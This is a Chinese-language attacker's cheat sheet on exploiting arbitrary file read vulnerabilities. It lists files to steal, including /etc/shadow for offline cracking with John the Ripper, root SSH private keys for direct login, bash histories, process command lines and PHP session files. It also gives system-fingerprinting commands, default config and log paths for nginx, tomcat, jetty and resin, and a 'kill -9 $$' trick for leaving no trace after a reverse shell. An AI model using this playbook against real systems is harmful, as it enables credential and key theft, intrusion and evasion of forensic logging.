任意文件读取漏洞的利用

任意文件读取的利用思路

有些文件需要高权限才能读取

  1. /etc/passwd # 用户情况
  2. /etc/shadow # 直接 John the Ripper
  3. /etc/hosts # 主机信息
  4. /root/.bashrc # 环境变量
  5. /root/.bash_history # 还有root外的其他用户
  6. /root/.viminfo # vim 信息
  7. /root/.ssh/id_rsa # 拿私钥直接ssh
  8. /proc/xxxx/cmdline # 进程状态枚举 xxxx 可以为0000-9999 使用burpsuite
  9. 数据库 config 文件
  10. web 日志 access.log, error.log
  11. ssh 日志
  12. /var/lib/php/sess_PHPSESSID # 非常规问题 session 文件( 参考 平安科技的一道session包含 http://www.jianshu.com/p/2c24ea34566b)

进一步推断系统版本

1
2
3
4
5
6
7
8
9
uname -a
lsb_release -d
cat /etc/issue
cat /proc/version
cat /etc/redhat-release
cat /etc/debian_version
cat /etc/slackware_version
ls /etc/*version
cat /proc/cpuinfo

无痕反弹shell

1
kill -9 $$

常用默认路径整理

可以开虚拟机看看默认路径是什么

ssh

1
2
3
4
5
/root/.ssh/id_rsa
/root/.ssh/id_rsa.pub
/root/.ssh/authorized_keys
/etc/ssh/sshd_config
/var/log/secure

Nginx

1
2
3
4
5
6
7
8
/etc/nginx/nginx.conf
/var/www/html
/usr/local/services/nginx-1.6.2/logs/access.log
/usr/local/services/nginx-1.6.2/logs/error.log
/usr/local/services/nginx-1.6.2/nginx.conf
/usr/local/services/nginx-1.6.2/conf/nginx.conf
/usr/local/services/nginx-1.6.2/conf/proxy.conf
/usr/local/services/nginx-1.6.2/conf/extra/haolaiyao.conf

Apache

1
2
/home/httpd/
/home/httpd/www/

jetty

1
2
3
/usr/local/services/jetty-8.1.16/
/usr/local/services/jetty-8.1.16/logs/stderrout.log
/usr/local/services/jetty-8.1.16/etc/jetty.xml

resin

1
2
3
/usr/local/services/resin-4.0.44/
/usr/local/services/resin-4.0.44/conf/resin.xml
/usr/local/services/resin-4.0.44/conf/resin.properties

tomcat

1
2
/usr/local/services/apache-tomcat-8.0.23/logs
/usr/local/services/apache-tomcat-8.0.23/logs/catalina.out

svn

1
/home/svnroot/